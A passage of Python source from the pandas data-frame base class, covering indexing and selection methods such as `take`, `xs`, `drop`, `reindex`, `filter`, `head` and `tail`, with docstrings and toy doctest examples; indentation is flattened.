Take elements at positions 0 and 3 along the axis 0 (default).
Note how the actual indices selected (0 and 1) do not correspond to
our selected indices 0 and 3. That's because we are selecting the 0th
and 3rd rows, not rows whose indices equal 0 and 3.
>>> df.take([0, 3])
name class max_speed
0 falcon bird 389.0
1 monkey mammal NaN
Take elements at indices 1 and 2 along the axis 1 (column selection).
>>> df.take([1, 2], axis=1)
class max_speed
0 bird 389.0
2 bird 24.0
3 mammal 80.5
1 mammal NaN
We may take elements using negative integers for positive indices,
starting from the end of the object, just like with Python lists.
>>> df.take([-1, -2])
name class max_speed
1 monkey mammal NaN
3 lion mammal 80.5
"""
if is_copy is not None:
warnings.warn(
"is_copy is deprecated and will be removed in a future version. "
"'take' always returns a copy, so there is no need to specify this.",
FutureWarning,
stacklevel=2,
)
nv.validate_take(tuple(), kwargs)
self._consolidate_inplace()
new_data = self._data.take(
indices, axis=self._get_block_manager_axis(axis), verify=True
)
return self._constructor(new_data).__finalize__(self)
def _take_with_is_copy(self: FrameOrSeries, indices, axis=0) -> FrameOrSeries:
"""
Internal version of the `take` method that sets the `_is_copy`
attribute to keep track of the parent dataframe (using in indexing
for the SettingWithCopyWarning).
See the docstring of `take` for full explanation of the parameters.
"""
result = self.take(indices=indices, axis=axis)
# Maybe set copy if we didn't actually change the index.
if not result._get_axis(axis).equals(self._get_axis(axis)):
result._set_is_copy(self)
return result
def xs(self, key, axis=0, level=None, drop_level: bool_t = True):
"""
Return cross-section from the Series/DataFrame.
This method takes a `key` argument to select data at a particular
level of a MultiIndex.
Parameters
----------
key : label or tuple of label
Label contained in the index, or partially in a MultiIndex.
axis : {0 or 'index', 1 or 'columns'}, default 0
Axis to retrieve cross-section on.
level : object, defaults to first n levels (n=1 or len(key))
In case of a key partially contained in a MultiIndex, indicate
which levels are used. Levels can be referred by label or position.
drop_level : bool, default True
If False, returns object with same levels as self.
Returns
-------
Series or DataFrame
Cross-section from the original Series or DataFrame
corresponding to the selected index levels.
See Also
--------
DataFrame.loc : Access a group of rows and columns
by label(s) or a boolean array.
DataFrame.iloc : Purely integer-location based indexing
for selection by position.
Notes
-----
`xs` can not be used to set values.
MultiIndex Slicers is a generic way to get/set values on
any level or levels.
It is a superset of `xs` functionality, see
:ref:`MultiIndex Slicers <advanced.mi_slicers>`.
Examples
--------
>>> d = {'num_legs': [4, 4, 2, 2],
... 'num_wings': [0, 0, 2, 2],
... 'class': ['mammal', 'mammal', 'mammal', 'bird'],
... 'animal': ['cat', 'dog', 'bat', 'penguin'],
... 'locomotion': ['walks', 'walks', 'flies', 'walks']}
>>> df = pd.DataFrame(data=d)
>>> df = df.set_index(['class', 'animal', 'locomotion'])
>>> df
num_legs num_wings
class animal locomotion
mammal cat walks 4 0
dog walks 4 0
bat flies 2 2
bird penguin walks 2 2
Get values at specified index
>>> df.xs('mammal')
num_legs num_wings
animal locomotion
cat walks 4 0
dog walks 4 0
bat flies 2 2
Get values at several indexes
>>> df.xs(('mammal', 'dog'))
num_legs num_wings
locomotion
walks 4 0
Get values at specified index and level
>>> df.xs('cat', level=1)
num_legs num_wings
class locomotion
mammal walks 4 0
Get values at several indexes and levels
>>> df.xs(('bird', 'walks'),
... level=[0, 'locomotion'])
num_legs num_wings
animal
penguin 2 2
Get values at specified column and axis
>>> df.xs('num_wings', axis=1)
class animal locomotion
mammal cat walks 0
dog walks 0
bat flies 2
bird penguin walks 2
Name: num_wings, dtype: int64
"""
axis = self._get_axis_number(axis)
labels = self._get_axis(axis)
if level is not None:
loc, new_ax = labels.get_loc_level(key, level=level, drop_level=drop_level)
# create the tuple of the indexer
_indexer = [slice(None)] * self.ndim
_indexer[axis] = loc
indexer = tuple(_indexer)
result = self.iloc[indexer]
setattr(result, result._get_axis_name(axis), new_ax)
return result
if axis == 1:
return self[key]
self._consolidate_inplace()
index = self.index
if isinstance(index, MultiIndex):
loc, new_index = self.index.get_loc_level(key, drop_level=drop_level)
else:
loc = self.index.get_loc(key)
if isinstance(loc, np.ndarray):
if loc.dtype == np.bool_:
(inds,) = loc.nonzero()
return self._take_with_is_copy(inds, axis=axis)
else:
return self._take_with_is_copy(loc, axis=axis)
if not is_scalar(loc):
new_index = self.index[loc]
if is_scalar(loc):
# In this case loc should be an integer
if self.ndim == 1:
# if we encounter an array-like and we only have 1 dim
# that means that their are list/ndarrays inside the Series!
# so just return them (GH 6394)
return self._values[loc]
new_values = self._data.fast_xs(loc)
result = self._constructor_sliced(
new_values,
index=self.columns,
name=self.index[loc],
dtype=new_values.dtype,
)
else:
result = self.iloc[loc]
result.index = new_index
# this could be a view
# but only in a single-dtyped view sliceable case
result._set_is_copy(self, copy=not result._is_view)
return result
_xs: Callable = xs
def __getitem__(self, item):
raise AbstractMethodError(self)
def _get_item_cache(self, item):
"""Return the cached item, item represents a label indexer."""
cache = self._item_cache
res = cache.get(item)
if res is None:
values = self._data.get(item)
res = self._box_item_values(item, values)
cache[item] = res
res._set_as_cached(item, self)
# for a chain
res._is_copy = self._is_copy
return res
def _box_item_values(self, key, values):
raise AbstractMethodError(self)
def _slice(self: FrameOrSeries, slobj: slice, axis=0) -> FrameOrSeries:
"""
Construct a slice of this container.
Slicing with this method is *always* positional.
"""
assert isinstance(slobj, slice), type(slobj)
axis = self._get_block_manager_axis(axis)
result = self._constructor(self._data.get_slice(slobj, axis=axis))
result = result.__finalize__(self)
# this could be a view
# but only in a single-dtyped view sliceable case
is_copy = axis != 0 or result._is_view
result._set_is_copy(self, copy=is_copy)
return result
def _set_item(self, key, value) -> None:
self._data.set(key, value)
self._clear_item_cache()
def _set_is_copy(self, ref, copy: bool_t = True) -> None:
if not copy:
self._is_copy = None
else:
assert ref is not None
self._is_copy = weakref.ref(ref)
def _check_is_chained_assignment_possible(self) -> bool_t:
"""
Check if we are a view, have a cacher, and are of mixed type.
If so, then force a setitem_copy check.
Should be called just near setting a value
Will return a boolean if it we are a view and are cached, but a
single-dtype meaning that the cacher should be updated following
setting.
"""
if self._is_view and self._is_cached:
ref = self._get_cacher()
if ref is not None and ref._is_mixed_type:
self._check_setitem_copy(stacklevel=4, t="referant", force=True)
return True
elif self._is_copy:
self._check_setitem_copy(stacklevel=4, t="referant")
return False
def _check_setitem_copy(self, stacklevel=4, t="setting", force=False):
"""
Parameters
----------
stacklevel : int, default 4
the level to show of the stack when the error is output
t : str, the type of setting error
force : bool, default False
If True, then force showing an error.
validate if we are doing a setitem on a chained copy.
If you call this function, be sure to set the stacklevel such that the
user will see the error *at the level of setting*
It is technically possible to figure out that we are setting on
a copy even WITH a multi-dtyped pandas object. In other words, some
blocks may be views while other are not. Currently _is_view will ALWAYS
return False for multi-blocks to avoid having to handle this case.
df = DataFrame(np.arange(0,9), columns=['count'])
df['group'] = 'b'
# This technically need not raise SettingWithCopy if both are view
# (which is not # generally guaranteed but is usually True. However,
# this is in general not a good practice and we recommend using .loc.
df.iloc[0:5]['group'] = 'a'
"""
# return early if the check is not needed
if not (force or self._is_copy):
return
value = config.get_option("mode.chained_assignment")
if value is None:
return
# see if the copy is not actually referred; if so, then dissolve
# the copy weakref
if self._is_copy is not None and not isinstance(self._is_copy, str):
r = self._is_copy()
if not gc.get_referents(r) or r.shape == self.shape:
self._is_copy = None
return
# a custom message
if isinstance(self._is_copy, str):
t = self._is_copy
elif t == "referant":
t = (
"\n"
"A value is trying to be set on a copy of a slice from a "
"DataFrame\n\n"
"See the caveats in the documentation: "
"https://pandas.pydata.org/pandas-docs/stable/user_guide/"
"indexing.html#returning-a-view-versus-a-copy"
)
else:
t = (
"\n"
"A value is trying to be set on a copy of a slice from a "
"DataFrame.\n"
"Try using .loc[row_indexer,col_indexer] = value "
"instead\n\nSee the caveats in the documentation: "
"https://pandas.pydata.org/pandas-docs/stable/user_guide/"
"indexing.html#returning-a-view-versus-a-copy"
)
if value == "raise":
raise com.SettingWithCopyError(t)
elif value == "warn":
warnings.warn(t, com.SettingWithCopyWarning, stacklevel=stacklevel)
def __delitem__(self, key) -> None:
"""
Delete item
"""
deleted = False
maybe_shortcut = False
if self.ndim == 2 and isinstance(self.columns, MultiIndex):
try:
maybe_shortcut = key not in self.columns._engine
except TypeError:
pass
if maybe_shortcut:
# Allow shorthand to delete all columns whose first len(key)
# elements match key:
if not isinstance(key, tuple):
key = (key,)
for col in self.columns:
if isinstance(col, tuple) and col[: len(key)] == key:
del self[col]
deleted = True
if not deleted:
# If the above loop ran and didn't delete anything because
# there was no match, this call should raise the appropriate
# exception:
self._data.delete(key)
# delete from the caches
try:
del self._item_cache[key]
except KeyError:
pass
# ----------------------------------------------------------------------
# Unsorted
def get(self, key, default=None):
"""
Get item from object for given key (ex: DataFrame column).
Returns default value if not found.
Parameters
----------
key : object
Returns
-------
value : same type as items contained in object
"""
try:
return self[key]
except (KeyError, ValueError, IndexError):
return default
@property
def _is_view(self) -> bool_t:
"""Return boolean indicating if self is view of another array """
return self._data.is_view
def reindex_like(
self: FrameOrSeries,
other,
method: Optional[str] = None,
copy: bool_t = True,
limit=None,
tolerance=None,
) -> FrameOrSeries:
"""
Return an object with matching indices as other object.
Conform the object to the same index on all axes. Optional
filling logic, placing NaN in locations having no value
in the previous index. A new object is produced unless the
new index is equivalent to the current one and copy=False.
Parameters
----------
other : Object of the same data type
Its row and column indices are used to define the new indices
of this object.
method : {None, 'backfill'/'bfill', 'pad'/'ffill', 'nearest'}
Method to use for filling holes in reindexed DataFrame.
Please note: this is only applicable to DataFrames/Series with a
monotonically increasing/decreasing index.
* None (default): don't fill gaps
* pad / ffill: propagate last valid observation forward to next
valid
* backfill / bfill: use next valid observation to fill gap
* nearest: use nearest valid observations to fill gap.
copy : bool, default True
Return a new object, even if the passed indexes are the same.
limit : int, default None
Maximum number of consecutive labels to fill for inexact matches.
tolerance : optional
Maximum distance between original and new labels for inexact
matches. The values of the index at the matching locations most
satisfy the equation ``abs(index[indexer] - target) <= tolerance``.
Tolerance may be a scalar value, which applies the same tolerance
to all values, or list-like, which applies variable tolerance per
element. List-like includes list, tuple, array, Series, and must be
the same size as the index and its dtype must exactly match the
index's type.
.. versionadded:: 0.21.0 (list-like tolerance)
Returns
-------
Series or DataFrame
Same type as caller, but with changed indices on each axis.
See Also
--------
DataFrame.set_index : Set row labels.
DataFrame.reset_index : Remove row labels or move them to new columns.
DataFrame.reindex : Change to new indices or expand indices.
Notes
-----
Same as calling
``.reindex(index=other.index, columns=other.columns,...)``.
Examples
--------
>>> df1 = pd.DataFrame([[24.3, 75.7, 'high'],
... [31, 87.8, 'high'],
... [22, 71.6, 'medium'],
... [35, 95, 'medium']],
... columns=['temp_celsius', 'temp_fahrenheit',
... 'windspeed'],
... index=pd.date_range(start='2014-02-12',
... end='2014-02-15', freq='D'))
>>> df1
temp_celsius temp_fahrenheit windspeed
2014-02-12 24.3 75.7 high
2014-02-13 31.0 87.8 high
2014-02-14 22.0 71.6 medium
2014-02-15 35.0 95.0 medium
>>> df2 = pd.DataFrame([[28, 'low'],
... [30, 'low'],
... [35.1, 'medium']],
... columns=['temp_celsius', 'windspeed'],
... index=pd.DatetimeIndex(['2014-02-12', '2014-02-13',
... '2014-02-15']))
>>> df2
temp_celsius windspeed
2014-02-12 28.0 low
2014-02-13 30.0 low
2014-02-15 35.1 medium
>>> df2.reindex_like(df1)
temp_celsius temp_fahrenheit windspeed
2014-02-12 28.0 NaN low
2014-02-13 30.0 NaN low
2014-02-14 NaN NaN NaN
2014-02-15 35.1 NaN medium
"""
d = other._construct_axes_dict(
axes=self._AXIS_ORDERS,
method=method,
copy=copy,
limit=limit,
tolerance=tolerance,
)
return self.reindex(**d)
def drop(
self,
labels=None,
axis=0,
index=None,
columns=None,
level=None,
inplace: bool_t = False,
errors: str = "raise",
):
inplace = validate_bool_kwarg(inplace, "inplace")
if labels is not None:
if index is not None or columns is not None:
raise ValueError("Cannot specify both 'labels' and 'index'/'columns'")
axis_name = self._get_axis_name(axis)
axes = {axis_name: labels}
elif index is not None or columns is not None:
axes, _ = self._construct_axes_from_arguments((index, columns), {})
else:
raise ValueError(
"Need to specify at least one of 'labels', 'index' or 'columns'"
)
obj = self
for axis, labels in axes.items():
if labels is not None:
obj = obj._drop_axis(labels, axis, level=level, errors=errors)
if inplace:
self._update_inplace(obj)
else:
return obj
def _drop_axis(
self: FrameOrSeries, labels, axis, level=None, errors: str = "raise"
) -> FrameOrSeries:
"""
Drop labels from specified axis. Used in the ``drop`` method
internally.
Parameters
----------
labels : single label or list-like
axis : int or axis name
level : int or level name, default None
For MultiIndex
errors : {'ignore', 'raise'}, default 'raise'
If 'ignore', suppress error and existing labels are dropped.
"""
axis = self._get_axis_number(axis)
axis_name = self._get_axis_name(axis)
axis = self._get_axis(axis)
if axis.is_unique:
if level is not None:
if not isinstance(axis, MultiIndex):
raise AssertionError("axis must be a MultiIndex")
new_axis = axis.drop(labels, level=level, errors=errors)
else:
new_axis = axis.drop(labels, errors=errors)
result = self.reindex(**{axis_name: new_axis})
# Case for non-unique axis
else:
labels = ensure_object(com.index_labels_to_array(labels))
if level is not None:
if not isinstance(axis, MultiIndex):
raise AssertionError("axis must be a MultiIndex")
indexer = ~axis.get_level_values(level).isin(labels)
# GH 18561 MultiIndex.drop should raise if label is absent
if errors == "raise" and indexer.all():
raise KeyError(f"{labels} not found in axis")
else:
indexer = ~axis.isin(labels)
# Check if label doesn't exist along axis
labels_missing = (axis.get_indexer_for(labels) == -1).any()
if errors == "raise" and labels_missing:
raise KeyError(f"{labels} not found in axis")
slicer = [slice(None)] * self.ndim
slicer[self._get_axis_number(axis_name)] = indexer
result = self.loc[tuple(slicer)]
return result
def _update_inplace(self, result, verify_is_copy: bool_t = True) -> None:
"""
Replace self internals with result.
Parameters
----------
verify_is_copy : bool, default True
Provide is_copy checks.
"""
# NOTE: This does *not* call __finalize__ and that's an explicit
# decision that we may revisit in the future.
self._reset_cache()
self._clear_item_cache()
self._data = getattr(result, "_data", result)
self._maybe_update_cacher(verify_is_copy=verify_is_copy)
def add_prefix(self: FrameOrSeries, prefix: str) -> FrameOrSeries:
"""
Prefix labels with string `prefix`.
For Series, the row labels are prefixed.
For DataFrame, the column labels are prefixed.
Parameters
----------
prefix : str
The string to add before each label.
Returns
-------
Series or DataFrame
New Series or DataFrame with updated labels.
See Also
--------
Series.add_suffix: Suffix row labels with string `suffix`.
DataFrame.add_suffix: Suffix column labels with string `suffix`.
Examples
--------
>>> s = pd.Series([1, 2, 3, 4])
>>> s
0 1
1 2
2 3
3 4
dtype: int64
>>> s.add_prefix('item_')
item_0 1
item_1 2
item_2 3
item_3 4
dtype: int64
>>> df = pd.DataFrame({'A': [1, 2, 3, 4], 'B': [3, 4, 5, 6]})
>>> df
A B
0 1 3
1 2 4
2 3 5
3 4 6
>>> df.add_prefix('col_')
col_A col_B
0 1 3
1 2 4
2 3 5
3 4 6
"""
f = functools.partial("{prefix}{}".format, prefix=prefix)
mapper = {self._info_axis_name: f}
return self.rename(**mapper) # type: ignore
def add_suffix(self: FrameOrSeries, suffix: str) -> FrameOrSeries:
"""
Suffix labels with string `suffix`.
For Series, the row labels are suffixed.
For DataFrame, the column labels are suffixed.
Parameters
----------
suffix : str
The string to add after each label.
Returns
-------
Series or DataFrame
New Series or DataFrame with updated labels.
See Also
--------
Series.add_prefix: Prefix row labels with string `prefix`.
DataFrame.add_prefix: Prefix column labels with string `prefix`.
Examples
--------
>>> s = pd.Series([1, 2, 3, 4])
>>> s
0 1
1 2
2 3
3 4
dtype: int64
>>> s.add_suffix('_item')
0_item 1
1_item 2
2_item 3
3_item 4
dtype: int64
>>> df = pd.DataFrame({'A': [1, 2, 3, 4], 'B': [3, 4, 5, 6]})
>>> df
A B
0 1 3
1 2 4
2 3 5
3 4 6
>>> df.add_suffix('_col')
A_col B_col
0 1 3
1 2 4
2 3 5
3 4 6
"""
f = functools.partial("{}{suffix}".format, suffix=suffix)
mapper = {self._info_axis_name: f}
return self.rename(**mapper) # type: ignore
def sort_values(
self,
axis=0,
ascending=True,
inplace: bool_t = False,
kind: str = "quicksort",
na_position: str = "last",
ignore_index: bool_t = False,
):
"""
Sort by the values along either axis.
Parameters
----------%(optional_by)s
axis : %(axes_single_arg)s, default 0
Axis to be sorted.
ascending : bool or list of bool, default True
Sort ascending vs. descending. Specify list for multiple sort
orders. If this is a list of bools, must match the length of
the by.
inplace : bool, default False
If True, perform operation in-place.
kind : {'quicksort', 'mergesort', 'heapsort'}, default 'quicksort'
Choice of sorting algorithm. See also ndarray.np.sort for more
information. `mergesort` is the only stable algorithm. For
DataFrames, this option is only applied when sorting on a single
column or label.
na_position : {'first', 'last'}, default 'last'
Puts NaNs at the beginning if `first`; `last` puts NaNs at the
end.
ignore_index : bool, default False
If True, the resulting axis will be labeled 0, 1, …, n - 1.
.. versionadded:: 1.0.0
Returns
-------
sorted_obj : DataFrame or None
DataFrame with sorted values if inplace=False, None otherwise.
Examples
--------
>>> df = pd.DataFrame({
... 'col1': ['A', 'A', 'B', np.nan, 'D', 'C'],
... 'col2': [2, 1, 9, 8, 7, 4],
... 'col3': [0, 1, 9, 4, 2, 3],
... })
>>> df
col1 col2 col3
0 A 2 0
1 A 1 1
2 B 9 9
3 NaN 8 4
4 D 7 2
5 C 4 3
Sort by col1
>>> df.sort_values(by=['col1'])
col1 col2 col3
0 A 2 0
1 A 1 1
2 B 9 9
5 C 4 3
4 D 7 2
3 NaN 8 4
Sort by multiple columns
>>> df.sort_values(by=['col1', 'col2'])
col1 col2 col3
1 A 1 1
0 A 2 0
2 B 9 9
5 C 4 3
4 D 7 2
3 NaN 8 4
Sort Descending
>>> df.sort_values(by='col1', ascending=False)
col1 col2 col3
4 D 7 2
5 C 4 3
2 B 9 9
0 A 2 0
1 A 1 1
3 NaN 8 4
Putting NAs first
>>> df.sort_values(by='col1', ascending=False, na_position='first')
col1 col2 col3
3 NaN 8 4
4 D 7 2
5 C 4 3
2 B 9 9
0 A 2 0
1 A 1 1
"""
raise AbstractMethodError(self)
def reindex(self: FrameOrSeries, *args, **kwargs) -> FrameOrSeries:
"""
Conform %(klass)s to new index with optional filling logic.
Places NA/NaN in locations having no value in the previous index. A new object
is produced unless the new index is equivalent to the current one and
``copy=False``.
Parameters
----------
%(optional_labels)s
%(axes)s : array-like, optional
New labels / index to conform to, should be specified using
keywords. Preferably an Index object to avoid duplicating data.
%(optional_axis)s
method : {None, 'backfill'/'bfill', 'pad'/'ffill', 'nearest'}
Method to use for filling holes in reindexed DataFrame.
Please note: this is only applicable to DataFrames/Series with a
monotonically increasing/decreasing index.
* None (default): don't fill gaps
* pad / ffill: Propagate last valid observation forward to next
valid.
* backfill / bfill: Use next valid observation to fill gap.
* nearest: Use nearest valid observations to fill gap.
copy : bool, default True
Return a new object, even if the passed indexes are the same.
level : int or name
Broadcast across a level, matching Index values on the
passed MultiIndex level.
fill_value : scalar, default np.NaN
Value to use for missing values. Defaults to NaN, but can be any
"compatible" value.
limit : int, default None
Maximum number of consecutive elements to forward or backward fill.
tolerance : optional
Maximum distance between original and new labels for inexact
matches. The values of the index at the matching locations most
satisfy the equation ``abs(index[indexer] - target) <= tolerance``.
Tolerance may be a scalar value, which applies the same tolerance
to all values, or list-like, which applies variable tolerance per
element. List-like includes list, tuple, array, Series, and must be
the same size as the index and its dtype must exactly match the
index's type.
.. versionadded:: 0.21.0 (list-like tolerance)
Returns
-------
%(klass)s with changed index.
See Also
--------
DataFrame.set_index : Set row labels.
DataFrame.reset_index : Remove row labels or move them to new columns.
DataFrame.reindex_like : Change to same indices as other DataFrame.
Examples
--------
``DataFrame.reindex`` supports two calling conventions
* ``(index=index_labels, columns=column_labels, ...)``
* ``(labels, axis={'index', 'columns'}, ...)``
We *highly* recommend using keyword arguments to clarify your
intent.
Create a dataframe with some fictional data.
>>> index = ['Firefox', 'Chrome', 'Safari', 'IE10', 'Konqueror']
>>> df = pd.DataFrame({'http_status': [200, 200, 404, 404, 301],
... 'response_time': [0.04, 0.02, 0.07, 0.08, 1.0]},
... index=index)
>>> df
http_status response_time
Firefox 200 0.04
Chrome 200 0.02
Safari 404 0.07
IE10 404 0.08
Konqueror 301 1.00
Create a new index and reindex the dataframe. By default
values in the new index that do not have corresponding
records in the dataframe are assigned ``NaN``.
>>> new_index = ['Safari', 'Iceweasel', 'Comodo Dragon', 'IE10',
... 'Chrome']
>>> df.reindex(new_index)
http_status response_time
Safari 404.0 0.07
Iceweasel NaN NaN
Comodo Dragon NaN NaN
IE10 404.0 0.08
Chrome 200.0 0.02
We can fill in the missing values by passing a value to
the keyword ``fill_value``. Because the index is not monotonically
increasing or decreasing, we cannot use arguments to the keyword
``method`` to fill the ``NaN`` values.
>>> df.reindex(new_index, fill_value=0)
http_status response_time
Safari 404 0.07
Iceweasel 0 0.00
Comodo Dragon 0 0.00
IE10 404 0.08
Chrome 200 0.02
>>> df.reindex(new_index, fill_value='missing')
http_status response_time
Safari 404 0.07
Iceweasel missing missing
Comodo Dragon missing missing
IE10 404 0.08
Chrome 200 0.02
We can also reindex the columns.
>>> df.reindex(columns=['http_status', 'user_agent'])
http_status user_agent
Firefox 200 NaN
Chrome 200 NaN
Safari 404 NaN
IE10 404 NaN
Konqueror 301 NaN
Or we can use "axis-style" keyword arguments
>>> df.reindex(['http_status', 'user_agent'], axis="columns")
http_status user_agent
Firefox 200 NaN
Chrome 200 NaN
Safari 404 NaN
IE10 404 NaN
Konqueror 301 NaN
To further illustrate the filling functionality in
``reindex``, we will create a dataframe with a
monotonically increasing index (for example, a sequence
of dates).
>>> date_index = pd.date_range('1/1/2010', periods=6, freq='D')
>>> df2 = pd.DataFrame({"prices": [100, 101, np.nan, 100, 89, 88]},
... index=date_index)
>>> df2
prices
2010-01-01 100.0
2010-01-02 101.0
2010-01-03 NaN
2010-01-04 100.0
2010-01-05 89.0
2010-01-06 88.0
Suppose we decide to expand the dataframe to cover a wider
date range.
>>> date_index2 = pd.date_range('12/29/2009', periods=10, freq='D')
>>> df2.reindex(date_index2)
prices
2009-12-29 NaN
2009-12-30 NaN
2009-12-31 NaN
2010-01-01 100.0
2010-01-02 101.0
2010-01-03 NaN
2010-01-04 100.0
2010-01-05 89.0
2010-01-06 88.0
2010-01-07 NaN
The index entries that did not have a value in the original data frame
(for example, '2009-12-29') are by default filled with ``NaN``.
If desired, we can fill in the missing values using one of several
options.
For example, to back-propagate the last valid value to fill the ``NaN``
values, pass ``bfill`` as an argument to the ``method`` keyword.
>>> df2.reindex(date_index2, method='bfill')
prices
2009-12-29 100.0
2009-12-30 100.0
2009-12-31 100.0
2010-01-01 100.0
2010-01-02 101.0
2010-01-03 NaN
2010-01-04 100.0
2010-01-05 89.0
2010-01-06 88.0
2010-01-07 NaN
Please note that the ``NaN`` value present in the original dataframe
(at index value 2010-01-03) will not be filled by any of the
value propagation schemes. This is because filling while reindexing
does not look at dataframe values, but only compares the original and
desired indexes. If you do want to fill in the ``NaN`` values present
in the original dataframe, use the ``fillna()`` method.
See the :ref:`user guide <basics.reindexing>` for more.
"""
# TODO: Decide if we care about having different examples for different
# kinds
# construct the args
axes, kwargs = self._construct_axes_from_arguments(args, kwargs)
method = missing.clean_reindex_fill_method(kwargs.pop("method", None))
level = kwargs.pop("level", None)
copy = kwargs.pop("copy", True)
limit = kwargs.pop("limit", None)
tolerance = kwargs.pop("tolerance", None)
fill_value = kwargs.pop("fill_value", None)
# Series.reindex doesn't use / need the axis kwarg
# We pop and ignore it here, to make writing Series/Frame generic code
# easier
kwargs.pop("axis", None)
if kwargs:
raise TypeError(
"reindex() got an unexpected keyword "
f'argument "{list(kwargs.keys())[0]}"'
)
self._consolidate_inplace()
# if all axes that are requested to reindex are equal, then only copy
# if indicated must have index names equal here as well as values
if all(
self._get_axis(axis).identical(ax)
for axis, ax in axes.items()
if ax is not None
):
if copy:
return self.copy()
return self
# check if we are a multi reindex
if self._needs_reindex_multi(axes, method, level):
return self._reindex_multi(axes, copy, fill_value)
# perform the reindex on the axes
return self._reindex_axes(
axes, level, limit, tolerance, method, fill_value, copy
).__finalize__(self)
def _reindex_axes(
self: FrameOrSeries, axes, level, limit, tolerance, method, fill_value, copy
) -> FrameOrSeries:
"""Perform the reindex for all the axes."""
obj = self
for a in self._AXIS_ORDERS:
labels = axes[a]
if labels is None:
continue
ax = self._get_axis(a)
new_index, indexer = ax.reindex(
labels, level=level, limit=limit, tolerance=tolerance, method=method
)
axis = self._get_axis_number(a)
obj = obj._reindex_with_indexers(
{axis: [new_index, indexer]},
fill_value=fill_value,
copy=copy,
allow_dups=False,
)
return obj
def _needs_reindex_multi(self, axes, method, level) -> bool_t:
"""Check if we do need a multi reindex."""
return (
(com.count_not_none(*axes.values()) == self._AXIS_LEN)
and method is None
and level is None
and not self._is_mixed_type
)
def _reindex_multi(self, axes, copy, fill_value):
raise AbstractMethodError(self)
def _reindex_with_indexers(
self: FrameOrSeries,
reindexers,
fill_value=None,
copy: bool_t = False,
allow_dups: bool_t = False,
) -> FrameOrSeries:
"""allow_dups indicates an internal call here """
# reindex doing multiple operations on different axes if indicated
new_data = self._data
for axis in sorted(reindexers.keys()):
index, indexer = reindexers[axis]
baxis = self._get_block_manager_axis(axis)
if index is None:
continue
index = ensure_index(index)
if indexer is not None:
indexer = ensure_int64(indexer)
# TODO: speed up on homogeneous DataFrame objects
new_data = new_data.reindex_indexer(
index,
indexer,
axis=baxis,
fill_value=fill_value,
allow_dups=allow_dups,
copy=copy,
)
if copy and new_data is self._data:
new_data = new_data.copy()
return self._constructor(new_data).__finalize__(self)
def filter(
self: FrameOrSeries,
items=None,
like: Optional[str] = None,
regex: Optional[str] = None,
axis=None,
) -> FrameOrSeries:
"""
Subset the dataframe rows or columns according to the specified index labels.
Note that this routine does not filter a dataframe on its
contents. The filter is applied to the labels of the index.
Parameters
----------
items : list-like
Keep labels from axis which are in items.
like : str
Keep labels from axis for which "like in label == True".
regex : str (regular expression)
Keep labels from axis for which re.search(regex, label) == True.
axis : {0 or ‘index’, 1 or ‘columns’, None}, default None
The axis to filter on, expressed either as an index (int)
or axis name (str). By default this is the info axis,
'index' for Series, 'columns' for DataFrame.
Returns
-------
same type as input object
See Also
--------
DataFrame.loc : Access a group of rows and columns
by label(s) or a boolean array.
Notes
-----
The ``items``, ``like``, and ``regex`` parameters are
enforced to be mutually exclusive.
``axis`` defaults to the info axis that is used when indexing
with ``[]``.
Examples
--------
>>> df = pd.DataFrame(np.array(([1, 2, 3], [4, 5, 6])),
... index=['mouse', 'rabbit'],
... columns=['one', 'two', 'three'])
>>> # select columns by name
>>> df.filter(items=['one', 'three'])
one three
mouse 1 3
rabbit 4 6
>>> # select columns by regular expression
>>> df.filter(regex='e$', axis=1)
one three
mouse 1 3
rabbit 4 6
>>> # select rows containing 'bbi'
>>> df.filter(like='bbi', axis=0)
one two three
rabbit 4 5 6
"""
nkw = com.count_not_none(items, like, regex)
if nkw > 1:
raise TypeError(
"Keyword arguments `items`, `like`, or `regex` "
"are mutually exclusive"
)
if axis is None:
axis = self._info_axis_name
labels = self._get_axis(axis)
if items is not None:
name = self._get_axis_name(axis)
return self.reindex(**{name: [r for r in items if r in labels]})
elif like:
def f(x):
return like in ensure_str(x)
values = labels.map(f)
return self.loc(axis=axis)[values]
elif regex:
def f(x):
return matcher.search(ensure_str(x)) is not None
matcher = re.compile(regex)
values = labels.map(f)
return self.loc(axis=axis)[values]
else:
raise TypeError("Must pass either `items`, `like`, or `regex`")
def head(self: FrameOrSeries, n: int = 5) -> FrameOrSeries:
"""
Return the first `n` rows.
This function returns the first `n` rows for the object based
on position. It is useful for quickly testing if your object
has the right type of data in it.
For negative values of `n`, this function returns all rows except
the last `n` rows, equivalent to ``df[:-n]``.
Parameters
----------
n : int, default 5
Number of rows to select.
Returns
-------
same type as caller
The first `n` rows of the caller object.
See Also
--------
DataFrame.tail: Returns the last `n` rows.
Examples
--------
>>> df = pd.DataFrame({'animal': ['alligator', 'bee', 'falcon', 'lion',
... 'monkey', 'parrot', 'shark', 'whale', 'zebra']})
>>> df
animal
0 alligator
1 bee
2 falcon
3 lion
4 monkey
5 parrot
6 shark
7 whale
8 zebra
Viewing the first 5 lines
>>> df.head()
animal
0 alligator
1 bee
2 falcon
3 lion
4 monkey
Viewing the first `n` lines (three in this case)
>>> df.head(3)
animal
0 alligator
1 bee
2 falcon
For negative values of `n`
>>> df.head(-3)
animal
0 alligator
1 bee
2 falcon
3 lion
4 monkey
5 parrot
"""
return self.iloc[:n]
def tail(self: FrameOrSeries, n: int = 5) -> FrameOrSeries:
"""
Return the last `n` rows.
This function returns last `n` rows from the object based on
position. It is useful for quickly verifying data, for example,
after sorting or appending rows.
For negative values of `n`, this function returns all rows except
the first `n` rows, equivalent to ``df[n:]``.
Parameters
----------
n : int, default 5
Number of rows to select.
Returns
-------
type of caller
The last `n` rows of the caller object.
See Also
--------
DataFrame.head : The first `n` rows of the caller object.
Examples
--------
>>> df = pd.DataFrame({'animal': ['alligator', 'bee', 'falcon', 'lion',
... 'monkey', 'parrot', 'shark', 'whale', 'zebra']})
>>> df
animal
0 alligator
1 bee
2 falcon
3 lion
4 monkey
5 parrot
6 shark
7 whale
8 zebra
Viewing the last 5 lines
>>> df.tail()
animal
4 monkey
5 parrot
6 shark
7 whale
8 zebra
Viewing the last `n` lines (three in this case)
>>> df.tail(3)
animal
6 shark
7 whale
8 zebra
For negative values of `n`
>>> df.tail(-3)
animal
3 lion
4 monkey
5 parrot
6 shark
7 whale
8 zebra
"""
if n == 0:
return self.iloc[0:0]
return self.iloc[-n:]
def sample(
self: FrameOrSeries,
n=None,
frac=None,
replace=False,
weights=None,
random_state=None,
axis=None,
) -> FrameOrSeries:
"""
Return a random sample of items from an axis of object.
You can use `random_state` for reproducibility.
Parameters
----------
n : int, optional
